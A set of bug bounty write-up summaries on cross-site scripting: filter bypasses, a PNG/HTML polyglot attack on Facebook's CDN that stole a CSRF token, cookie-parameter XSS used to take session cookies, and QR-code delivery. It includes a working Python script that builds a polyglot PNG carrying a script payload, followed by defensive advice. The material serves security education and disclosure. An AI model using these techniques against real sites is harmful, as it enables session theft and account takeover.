A bug bounty hunter describes finding five stored XSS vulnerabilities on a private program, paid at $1,016.66 each, and the techniques used to get past the input filters: choosing where in the input the payload lands, encoded variants of the `<` character, uploading `.xhtml` files (which browsers parse as XML and in which inline script executes), and targeting unsanitized HTML in notifications that the filters never covered.
A critical XSS vulnerability on Facebook's CDN was achieved by encoding JavaScript into the IDAT (pixel data) chunks of a PNG so that the file was simultaneously a valid image and parseable HTML, uploading the image as an advertisement, then requesting it with an .html extension so that MIME sniffing made the browser interpret it as HTML. Because the script ran under a facebook.com subdomain, the attacker used document.domain to relax the same-origin check, read the fb_dtsg CSRF token from www.facebook.com, and bypass LinkShim protections.
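To make the polyglot idea concrete, here is an added example (not the original researcher's code) that builds a PNG whose IDAT chunk contains a script tag verbatim, then parses the file back to show it is still a valid image. It simplifies the real attack in one important way: it stores the scanline in an uncompressed ("stored") DEFLATE block, so the payload bytes appear literally in the file. The original research additionally had to survive Facebook's server-side re-encoding of uploaded images, which means choosing pixel values so that the *recompressed* IDAT stream still spells out the payload; that step, and serving the result with an .html extension, are outside this example. The payload string is constructed for illustration.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# Constructed sample payload; any bytes that browsers will sniff as HTML would do.
PAYLOAD = b"<script>alert(1)</script>"


def png_chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialize one PNG chunk: 4-byte length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def zlib_stored(raw: bytes) -> bytes:
    """zlib stream with a single 'stored' DEFLATE block (BTYPE=00), so `raw` is copied verbatim."""
    assert 0 < len(raw) < 65536, "one stored block holds at most 65535 bytes"
    header = b"\x78\x01"  # CMF/FLG: deflate, 32K window, no dictionary; 0x7801 % 31 == 0
    # Block header byte: BFINAL=1, BTYPE=00, then LEN and NLEN (one's complement) little-endian
    block = b"\x01" + struct.pack("<HH", len(raw), 0xFFFF ^ len(raw)) + raw
    return header + block + struct.pack(">I", zlib.adler32(raw) & 0xFFFFFFFF)


def build_polyglot_png(payload: bytes) -> bytes:
    """Single-row, 8-bit greyscale PNG whose pixel bytes are exactly `payload`.

    A scanline is one filter-type byte followed by width pixel bytes, so with
    width == len(payload) and filter type 0 (None) the payload is the row's pixels.
    """
    width, height = len(payload), 1
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0)  # depth 8, greyscale, no interlace
    scanline = b"\x00" + payload
    return (PNG_SIGNATURE
            + png_chunk(b"IHDR", ihdr)
            + png_chunk(b"IDAT", zlib_stored(scanline))
            + png_chunk(b"IEND", b""))


def parse_png(data: bytes):
    """Walk the chunk list, verifying the signature and every CRC; return [(type, body), ...]."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG")
    pos, chunks = len(PNG_SIGNATURE), []
    while pos + 12 <= len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        ctype = data[pos + 4:pos + 8]
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC on chunk {ctype!r}")
        chunks.append((ctype, body))
        pos += 12 + length
        if ctype == b"IEND":
            break
    return chunks


def decoded_pixels(data: bytes) -> bytes:
    """Inflate the IDAT data as a real decoder would and strip the single row's filter byte."""
    idat = b"".join(body for ctype, body in parse_png(data) if ctype == b"IDAT")
    raw = zlib.decompress(idat)
    return raw[1:]


def payload_literal_after_recompression(payload: bytes) -> bool:
    """Why the stored block matters: a normal deflate of the same scanline Huffman-codes the
    bytes, so the payload no longer appears verbatim. Surviving a server-side re-encode (as in
    the Facebook case) requires choosing pixels whose *compressed* form contains the payload."""
    return payload in zlib.compress(b"\x00" + payload, 9)


if __name__ == "__main__":
    png = build_polyglot_png(PAYLOAD)
    print("valid chunks:", [t for t, _ in parse_png(png)])
    print("payload offset in file:", png.find(PAYLOAD))
    print("pixels round-trip:", decoded_pixels(png) == PAYLOAD)
    print("literal after normal deflate:", payload_literal_after_recompression(PAYLOAD))
```

Written to disk as `x.png`, the output opens as a 25x1 greyscale image, yet a browser that sniffs or is told the content type is HTML will find `<script>` in the byte stream. The defensive takeaway is the same one the Facebook case illustrates: user-supplied files must be served with an explicit, correct `Content-Type` and `X-Content-Type-Options: nosniff`, from an origin that shares no cookies or `document.domain` with the application.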
A researcher discovered an XSS whose injection point was a cookie value. On its own that is hard to deliver, since the attacker needs some way to set the victim's cookie (typically by chaining a CRLF injection), but the application also accepted the same parameter as a URL GET parameter, which turned it into an ordinary reflected XSS deliverable by link and let them exfiltrate session cookies without any chained vulnerability.
A bug bounty researcher found a way to escalate a self-XSS into a reflected XSS by encoding the payload as a QR code: the encoded form got past the client-side filtering, and the payload executed as soon as a victim scanned the code, with no interaction required beyond the scan itself.